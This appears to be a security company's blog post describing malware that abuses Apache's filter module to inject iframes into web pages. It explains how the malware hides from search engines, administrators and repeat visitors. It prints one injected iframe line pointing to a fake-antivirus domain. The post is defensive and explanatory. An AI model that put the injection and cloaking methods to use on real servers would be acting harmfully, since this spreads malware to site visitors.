• Apache Used to Inject Malware

    Malware authors are constantly coming up with new ways to compromise web sites. Now the weakest link in the security chain, malicious hackers have started to focus on web sites, breaking in and then using them to distribute dangerous viruses. This spreads malware on PCs which are then used to form bot networks of compromised web sites. Customer data and the reputation of the web site and the online business is at stake. In this article, we will highlight a relatively new way that hackers can infect websites.

    Apache Filter Based Malware
    We have recently noted a new development in the world of web-malware. Malicious hackers have recently begun using the Apache Web Server’s filter module to inject malware into web pages. This process works in a similar way having the mailman stick a piece of gum (highly unlikely in real life) on the nice and clean envelope that you put into the mailbox. The recipient of the envelope might complain to you about the piece of gum (malware), and most people would be at a loss to determine whether it came from you.

    This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web server softwares in use today. This software is extremely flexible, scalable and very reliable. No wonder it is a good choice for webmasters, web hosts, website owners and such. Malicious hackers are banking on the popularity of Apache to provide them with the most bang for the buck.

    Apache through its flexibility, offers programmers the ability to create “filters.” The job of a filter is to allow real time analysis and modification of web page data. For example, if you wanted to add an advertisement to every page served from the webserver, this functionality would be of great use. Now filters are being abused by malicious hackers. These filters are being used to insert a piece of malware containing an iframe like the one below.

    This piece of malware leads to a fake AV site:

    iframe src="http://crocabhysanr4.cz.cc/[scrubbed]"

    Even though this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

    To clarify , this new kind of malware injection does not imply that Apache is compromised or has vulnerabilities. The Apache “filter” functionality is a feature that is being exploited by malicious hackers who have gained unauthorized access to a web server. This attack is extremely effective, since it can “infect” every page on the web server without changing a single file.

    In the past there have been other .htaccess based malware which try to evade detection by only serving infected web pages when a user visits the compromised site via a search engine like Google. This malware is much more sophisticated. It injects malware into outgoing HTML pages from the webserver, but only according to the following rules.

    The malware is not injected into outgoing webpages if:

    • The incoming HTTP request is coming from an IP which belongs to a search engine
    • The incoming HTTP request is coming from certain browser User Agents
    • The administrator is logged in or an administrator owned process is running

    Additionally, the very first time a user requests a page a session token is created for the connection, but the malware is not delivered this first time. The malware is delivered the second time that the same user, using the same session, makes a request for a web page. Interestingly, this process only serves the malware only once and adds the IP address of the user to a list so that it does not try to infect the same host again and again. This helps the malware reduce its probability of detection by Anti-Virus.

    We Can Help!
    If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.